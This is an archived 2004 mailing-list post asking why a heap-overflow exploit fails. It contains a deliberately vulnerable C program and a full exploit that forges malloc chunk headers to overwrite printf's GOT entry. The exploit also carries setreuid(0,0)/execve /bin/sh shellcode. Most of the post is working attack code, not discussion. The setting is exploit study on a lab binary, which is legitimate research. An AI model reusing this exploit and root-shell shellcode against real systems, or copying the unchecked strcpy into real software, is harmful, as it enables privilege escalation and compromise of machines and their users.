Vulnerability Development mailing list archives
heap overflows
From: <sigsegv () ureach com>
Date: 26 Feb 2004 23:42:07 -0000
Hi everyone, some questions about heap overflows: a. on examining the memory i find that the 'size' field is one byte more than the total length of the memory chunk. why is this so? b. my exploit does not work? am I doing something wrong?? Environment: Linux 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) glibc-2.3.2-11.9 thanks a zillion Here is my sample vulnerable code: Code: #include <stdio.h> #define MALLOCED_SIZE 64 int main(int argc, char** argv) { char* malloced_buffer1; char* malloced_buffer2; if(argc==1) { fprintf(stderr,"\nUsage: %s <string1> \n\n",argv[0]); exit(0); } malloced_buffer1 = (char*) malloc(sizeof(char) * MALLOCED_SIZE); malloced_buffer2 = (char*) malloc(sizeof(char) * MALLOCED_SIZE); if(malloced_buffer1 && malloced_buffer2) { printf("Address returned by malloc: %p\n",malloced_buffer1); strcpy(malloced_buffer1,argv[1]); printf("copied"); free(malloced_buffer1); free(malloced_buffer2); } return 0; } Here is my exploit code for the above code: Code: #include <stdio.h> #include <unistd.h> /* * This represents a sample exploit code for exploiting a malloc based buffer overflow * in a sample program called samplecode_vulnerable_to_heap_overflow.c in the same * directory. * * The GOT for printf will be overwritten as a part of the exploit. * GOT address for printf can be found out by: * objdump --dynamic-reloc <binary> * In our case it is: * 0804966c R_386_JUMP_SLOT printf */ #define MALLOCED_SIZE 64 #define RET_LOC 0x08049660 #define RET_ADDR 0x080497a8 /* * 31 bytes setreuid(0, 0) execve /bin/sh shellcode - linux-x86 * - by bighawk (bighawk-at-warfare.com) * http://www.groar.org/expl/linux-x86/setreuid.c */ char shellcode[] = "\x31\xdb" // xor ebx, ebx "\x31\xc9" // xor ecx, ecx "\xf7\xe3" // mul ebx "\xb0\x46" // mov al, 70 "\xcd\x80" // int 80h "\x53" // push ebx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x52" // push edx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\x0b" // mov al, 11 "\xcd\x80"; int main() { char buf[100]; int NOP_LEN = MALLOCED_SIZE - 2 - strlen(shellcode); buf[0] = 0xeb; /* this is to jump 12 bytes from the start of our shell code */ buf[1] = 0x0c; memset(buf+2, 0x90, NOP_LEN); /* NOP's */ memcpy(buf+2+NOP_LEN, shellcode, strlen(shellcode)); /* shell code */ /* overflowing of the destination buffer starts at the 64th byte */ *((long*)(buf+MALLOCED_SIZE)) = 0xfffffffc; /* prev_size */ *((long*)(buf + MALLOCED_SIZE + 4)) = 0xffffffff; /* size */ *((long*)(buf + MALLOCED_SIZE + 8)) = RET_LOC; /* fd = GOT address for printf-12 */ *((long*)(buf + MALLOCED_SIZE + 12)) = RET_ADDR; /* bk = address of our shell code */ buf[MALLOCED_SIZE + 16 + 1] = '\0'; execl("./samplecode_vulnerable_to_heap_overflow","samplecode_vulnerable_to_hea \ p_overflow",buf,(char *)0); perror("execl failed"); return 0; }
Current thread:
- heap overflows sigsegv (Feb 26)
- Re: heap overflows Steven Hill (Feb 26)
- <Possible follow-ups>
- Re: heap overflows Vlad902 (Feb 26)
- Re: heap overflows sigsegv (Feb 27)
- Re: heap overflows Vlad902 (Feb 27)